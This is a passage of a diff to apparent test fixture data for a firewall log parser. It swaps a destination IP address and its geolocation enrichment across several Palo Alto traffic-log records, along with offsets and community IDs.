+ "network.community_id": "1:fmI3tKXdcqsY5PoHvFSPPOmDSOc=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -1188,14 +1128,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -1218,19 +1158,15 @@
 "client.packets": 1,
 "client.port": 59316,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -1243,7 +1179,7 @@
 "event.end": "2012-04-10T04:39:57.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:57.000-02:00",
 "event.timezone": "-02:00",
@@ -1255,10 +1191,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 4387,
+ "log.offset": 4371,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=",
+ "network.community_id": "1:R89M2kJolrp3Qf6IPm++vTcewQU=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -1290,14 +1226,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -1320,19 +1256,15 @@
 "client.packets": 1,
 "client.port": 59315,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -1345,7 +1277,7 @@
 "event.end": "2012-04-10T04:39:57.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:57.000-02:00",
 "event.timezone": "-02:00",
@@ -1357,10 +1289,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 4751,
+ "log.offset": 4733,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=",
+ "network.community_id": "1:ymK/qi8Fj5E3NiB4Zt+MtiJFOHI=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -1392,14 +1324,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -1422,19 +1354,15 @@
 "client.packets": 6,
 "client.port": 59206,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -1447,7 +1375,7 @@
 "event.end": "2012-04-10T04:39:27.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:27.000-02:00",
 "event.timezone": "-02:00",
@@ -1459,10 +1387,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 5115,
+ "log.offset": 5095,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:SIxV4kkvJlBljF+gLKAaihputgk=",
+ "network.community_id": "1:1LRVWx60LdA8fxXWzX2/1Tw7z2w=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -1494,14 +1422,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -1524,19 +1452,15 @@
 "client.packets": 6,
 "client.port": 59205,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -1549,7 +1473,7 @@
 "event.end": "2012-04-10T04:39:27.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:26.000-02:00",
 "event.timezone": "-02:00",
@@ -1561,10 +1485,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 5500,
+ "log.offset": 5478,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:rpU2pqp4ioYKgiuDEfjZitnLkow=",
+ "network.community_id": "1:j8sr41e7fe8nlNwp3dvDhPoVFLA=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -1596,14 +1520,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 4,
 "server.port": 80,
 "service.type": "panw",
@@ -1626,19 +1550,15 @@
 "client.packets": 18,
 "client.port": 56858,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 551,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 3,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -1651,7 +1571,7 @@
 "event.end": "2012-04-10T04:38:26.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:29:54.000-02:00",
 "event.timezone": "-02:00",
@@ -1663,10 +1583,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 5885,
+ "log.offset": 5861,
 "network.application": "web-browsing",
 "network.bytes": 1910,
- "network.community_id": "1:JuKJfhPs1pDZMiwy04nz1EsD7PA=",
+ "network.community_id": "1:uHVTJP6Fq0Po1paDP+KSjgNuXMY=",
 "network.direction": "outbound",
 "network.packets": 21,
 "network.transport": "tcp",
@@ -1698,14 +1618,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 551,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 3,
 "server.port": 80,
 "service.type": "panw",
@@ -1728,19 +1648,15 @@
 "client.packets": 1,
 "client.port": 59314,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -1753,7 +1669,7 @@
 "event.end": "2012-04-10T04:39:56.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:56.000-02:00",
 "event.timezone": "-02:00",
@@ -1765,10 +1681,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 6267,
+ "log.offset": 6241,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=",
+ "network.community_id": "1:6ykXrYnnXhC2OTYegSkf7HauF6Y=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -1800,14 +1716,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -1830,19 +1746,15 @@
 "client.packets": 1,
 "client.port": 59313,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -1855,7 +1767,7 @@
 "event.end": "2012-04-10T04:39:56.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:56.000-02:00",
 "event.timezone": "-02:00",
@@ -1867,10 +1779,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 6631,
+ "log.offset": 6603,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=",
+ "network.community_id": "1:q5WSywQz9mnveJuMrWqG0rlBf3g=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -1902,14 +1814,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -1933,14 +1845,7 @@
 "client.port": 52139,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -1966,7 +1871,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 6995,
+ "log.offset": 6965,
 "network.application": "dns",
 "network.bytes": 69,
 "network.community_id": "1:vFErz1cKNExckY21peQ3YAc8Tmk=",
@@ -2032,14 +1937,7 @@
 "client.port": 60592,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 0,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 0,
 "destination.port": 53,
@@ -2065,7 +1963,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 7348,
+ "log.offset": 7318,
 "network.application": "dns",
 "network.bytes": 69,
 "network.community_id": "1:i4rdWjY94ZjxNIBve+QH3YwdL04=",
@@ -2130,19 +2028,15 @@
 "client.packets": 1,
 "client.port": 59309,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 0,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 0,
 "destination.port": 80,
 "event.action": "flow_started",
@@ -2155,7 +2049,7 @@
 "event.end": "2012-04-10T04:39:56.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:56.000-02:00",
 "event.timezone": "-02:00",
@@ -2167,10 +2061,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 7701,
+ "log.offset": 7671,
 "network.application": "web-browsing",
 "network.bytes": 78,
- "network.community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=",
+ "network.community_id": "1:tf34cPo413Ta9avfHZIP6b5DHXc=",
 "network.direction": "outbound",
 "network.packets": 1,
 "network.transport": "tcp",
@@ -2202,14 +2096,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 0,
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.packets": 0,
 "server.port": 80,
 "service.type": "panw",
@@ -2233,14 +2127,7 @@
 "client.port": 57322,
 "client.user.name": "crusher",
 "destination.address": "205.171.2.25",
- "destination.as.number": 209,
- "destination.as.organization.name": "CenturyLink Communications, LLC",
 "destination.bytes": 98,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "205.171.2.25",
 "destination.packets": 1,
 "destination.port": 53,
@@ -2266,7 +2153,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 8065,
+ "log.offset": 8033,
 "network.application": "dns",
 "network.bytes": 164,
 "network.community_id": "1:GjCL7PEzM4X3r7frQ42mW+tNEIQ=",
@@ -2331,19 +2218,15 @@
 "client.packets": 6,
 "client.port": 59204,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
 "destination.bytes": 806,
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.12",
 "destination.packets": 4,
 "destination.port": 80,
 "event.action": "flow_terminated",
@@ -2356,7 +2239,7 @@
 "event.end": "2012-04-10T04:39:26.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+ "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
 "event.outcome": "success",
 "event.start": "2012-04-10T04:39:26.000-02:00",
 "event.timezone": "-02:00",
@@ -2368,10 +2251,10 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.captive_portal": true,
- "log.offset": 8418,
+ "log.offset": 8386,
 "network.application": "web-browsing",
 "network.bytes": 1355,
- "network.community_id": "1:2+g5+FYJDJku+1Cl3ZbhVCYdAog=",
+ "network.community_id": "1:XrXJKzav0NPbbETBjwAeI3kQZUo=",
 "network.direction": "outbound",
 "network.packets": 10,
 "network.transport": "tcp",
@@ -2403,14 +2286,14 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
 "server.bytes": 806,
